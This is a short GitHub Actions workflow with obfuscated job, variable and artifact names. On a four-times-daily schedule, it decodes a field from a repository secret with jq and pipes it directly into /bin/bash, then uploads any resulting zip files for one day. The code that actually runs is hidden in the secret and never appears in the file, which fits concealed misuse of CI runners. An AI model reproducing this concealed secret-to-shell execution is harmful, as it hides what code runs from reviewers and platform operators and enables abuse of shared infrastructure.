name: xianshuangxiju
on:
  workflow_dispatch:

  schedule:
    - cron: '17 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianshuangxiju
        env:
          xyg81: ${{ secrets.xyg81 }}
        run: |
          printf '%s' "$xyg81" | jq -r .ipr882 | /bin/bash
          echo $kfoh749 | jq -r .ngsi6 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: orvArsfL
          path: "*.zip"
          retention-days: 1
